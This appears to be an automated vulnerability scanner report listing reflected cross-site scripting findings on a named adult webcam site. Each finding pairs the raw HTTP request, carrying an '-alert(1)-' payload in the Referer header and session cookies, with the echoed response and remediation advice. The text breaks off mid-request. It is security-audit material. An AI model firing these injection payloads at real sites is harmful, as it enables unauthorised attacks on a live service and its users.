Date: Fri, 28 Jan 2011 14:19:34 GMT
Connection: close
Content-Length: 27209
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... cript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category_sub.aspx&he=imlive.com&ul=/live-sex-chats/cam-girls/categories/&rf=http://www.google.com/search?hl=en^q=15c00'-alert(1)-'13ed03de9eb&qs=roomid=10&qs=roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.att ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abdb3'-alert(1)-'17f2cec9909 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cam-girls/hotspots/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=abdb3'-alert(1)-'17f2cec9909
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:14 GMT
Connection: close
Content-Length: 40632
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=abdb3'-alert(1)-'17f2cec9909&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e389'-alert(1)-'41c0351c2c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cams-aroundthehouse/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=5e389'-alert(1)-'41c0351c2c2
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:31 GMT
Connection: close
Content-Length: 33186
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/aroundthehouse.aspx&he=imlive.com&ul=/live-sex-chats/cams-aroundthehouse/&rf=http://www.google.com/search?hl=en^q=5e389'-alert(1)-'41c0351c2c2&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9792b'-alert(1)-'ba39155c916 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/caught-on-cam/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=9792b'-alert(1)-'ba39155c916
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 25658
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... xt/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/caughtoncam.aspx&he=imlive.com&ul=/live-sex-chats/caught-on-cam/&rf=http://www.google.com/search?hl=en^q=9792b'-alert(1)-'ba39155c916&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67099'-alert(1)-'bb279cc6b57 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=67099'-alert(1)-'bb279cc6b57
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:29 GMT
Connection: close
Content-Length: 113880
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/couple/&rf=http://www.google.com/search?hl=en^q=67099'-alert(1)-'bb279cc6b57&qs=cat=1^roomid=12&qs=cat=1^roomid=12&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8877f'-alert(1)-'f0d179f333a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/fetish/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=8877f'-alert(1)-'f0d179f333a
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:07 GMT
Connection: close
Content-Length: 213457
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/fetish/&rf=http://www.google.com/search?hl=en^q=8877f'-alert(1)-'f0d179f333a&qs=cat=1^roomid=13&qs=cat=1^roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c608e'-alert(1)-'0606a3ceeb1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/fetish/categories/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=c608e'-alert(1)-'0606a3ceeb1
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:36 GMT
Connection: close
Content-Length: 24548
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... t">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/fetish_category_sub.aspx&he=imlive.com&ul=/live-sex-chats/fetish/categories/&rf=http://www.google.com/search?hl=en^q=c608e'-alert(1)-'0606a3ceeb1&qs=roomid=13&qs=roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.att ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96bee'-alert(1)-'306a0aabfe1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/free-sex-video-for-ipod/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=96bee'-alert(1)-'306a0aabfe1
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 72576
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... script">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/ipodmain.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video-for-ipod/&rf=http://www.google.com/search?hl=en^q=96bee'-alert(1)-'306a0aabfe1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38c58'-alert(1)-'c21d7feff7f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/free-sex-video/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
